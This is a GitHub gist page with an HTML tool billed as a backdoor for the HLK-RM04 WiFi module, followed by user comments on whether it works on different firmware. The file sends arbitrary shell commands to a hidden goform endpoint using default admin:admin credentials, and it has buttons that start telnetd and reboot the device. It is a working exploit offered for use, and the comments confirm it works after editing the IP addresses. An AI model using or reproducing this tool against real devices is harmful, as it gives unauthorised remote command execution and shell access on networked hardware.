Create a gist now

Instantly share code, notes, and snippets.

What would you like to do?
Another backdoor for the rm04, need I say any more?
<html>
<head>
<title>HLK-RM04 Tool</title>
<style>
form {
display: inline;
}
</style>
</head>
<body>
<h1>HLK-RM04 Tool</h1>
<b>Shell command:</b><br />
<form action="http://admin:admin@192.168.16.254/goform/hlk34fge3360llf94wwq24" method="POST" target="frame">
<input type="text" name="command" size=40 /><input type="submit" value="Run" />
</form>
<hr />
<b>Quick actions:</b><br />
<form action="http://admin:admin@192.168.16.254/goform/hlk34fge3360llf94wwq24" method="POST" target="frame">
<input type="hidden" name="command" value="telnetd" /><input type="submit" value="Start telnetd" />
</form>
<form action="http://admin:admin@192.168.16.254/goform/hlk34fge3360llf94wwq24" method="POST" target="frame">
<input type="hidden" name="command" value="reboot" /><input type="submit" value="Reboot" />
</form>
<iframe src="about:blank" name="frame" width="0" height="0" frameborder="0"></iframe>
</body>
</html>
@belkinsky

This comment has been minimized.

Show comment Hide comment
@belkinsky

belkinsky Feb 9, 2014

Hi!

Not works for me. Firmware V1.78(Jul 23 2013)

Do you remember how to find action url in device's filesystem?

Hi!

Not works for me. Firmware V1.78(Jul 23 2013)

Do you remember how to find action url in device's filesystem?

@NittyGritty74141

This comment has been minimized.

Show comment Hide comment
@NittyGritty74141

NittyGritty74141 Feb 19, 2014

I have the same version and it works perfect. I jusst changed the three IP addresses in the file to the one of my module.

I have the same version and it works perfect. I jusst changed the three IP addresses in the file to the one of my module.

@beikeland

This comment has been minimized.

Show comment Hide comment
@beikeland

beikeland Dec 17, 2017

Seems this has changed over the years.

<html><head></head><body>
                This document has moved to a new <a href="http://192.168.0.1/adm/system_command.asp">location</a>.
                Please update your documents to reflect the new location.
                </body></html>

http://192.168.0.1/adm/system_command.asp results in a 404 page with both get and post requests.

beikeland commented Dec 17, 2017

Seems this has changed over the years.

<html><head></head><body>
                This document has moved to a new <a href="http://192.168.0.1/adm/system_command.asp">location</a>.
                Please update your documents to reflect the new location.
                </body></html>

http://192.168.0.1/adm/system_command.asp results in a 404 page with both get and post requests.

Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment